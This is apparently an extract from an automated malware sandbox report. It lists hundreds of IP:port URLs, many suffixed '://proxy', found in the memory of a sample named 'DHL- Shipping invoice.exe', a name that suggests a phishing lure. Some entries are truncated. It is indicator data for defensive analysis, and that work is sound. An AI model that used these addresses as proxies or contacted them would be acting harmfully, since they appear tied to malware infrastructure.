                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:21166://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:23880
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:23880://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:7936
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:7936://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:8078
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:8078://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.168.145:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.168.145:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.182.142.17:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.182.142.17:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.129:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.129:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.207:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.207:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98203C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.212:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.212:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.253:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.253:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.28:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.37:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.37:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.51:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.51:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.115:57493
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.115:57493://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.133.59:62699
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.133.59:62699://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.104.187.212:41890
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.111.212.78:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:9927://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.127.82.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.127.82.162:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.127.82.162:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.164.38.189:2306
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.164.38.189:2306://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.14.82:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.14.82:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.232.106.150:52435
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.232.106.150:52435://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:28618://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.208.138:21231
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.208.138:21231://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.229
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.229.233:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.229.233:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.248.235.46:4890
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.248.235.46:4890://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.72.232.217:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.72.232.217:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.73.184.94:23500
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981742000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.175.110:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.175.110:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.232.66.30:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.232.66.30:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.166.182:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.166.182:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.3.22
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.3.229:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.3.229:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.43.34.72:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.43.34.72:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.49.34.126:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.49.34.126:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.73.11.181:8123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.73.11.181:8123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803AA000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.195.2:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.195.2:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.171.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.196.174:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.196.174:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.236.235:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.236.235:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.138.125:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.138.125:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.151.213:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.151.213:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.152.76:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.152.76:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.93.231.73:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.93.231.73:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.199.70.169:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.199.70.169:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.212.136:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.212.136:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.20:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.20:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.86:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.86:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.59.4.88:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.59.4.88:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.117.200:4995
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.117.200:4995://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.8.155.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.8.155.54:7777
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.8.155.54:7777://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.90.150.109:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.90.150.109:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.198.150
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.198.150.11:8082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.198.150.11:8082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.205.92.14:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.205.92.14:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.131.6:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.131.6:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.134.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.134.132:7777
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.134.132:7777://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.161.93:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.161.93:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.165.60
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.165.60://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.165.60:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.125.82.11:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.125.82.11:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.143.37.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.143.37.82:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.143.37.82:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.16.142:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.16.142:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.59.136:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.93.29:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.93.29:8080&Z
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.93.29:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.150:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.150:1080://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.255:7654
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.255:7654://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.208.119.142:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.208.119.142:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.22.93.112:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.22.93.112:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.29.228:13629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.74.26.114:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.74.26.114:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981359000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.74.26.116:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.74.26.116:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.81.201:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.81.201:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.89.252:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.89.252:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.173.229:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.173.229:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.202.246:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.202.246:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.141.61.5:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.141.61.5:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.235:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.235:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.41:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.41:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.41:8089PKz
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.97:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.42.97:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.108:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.178:8089
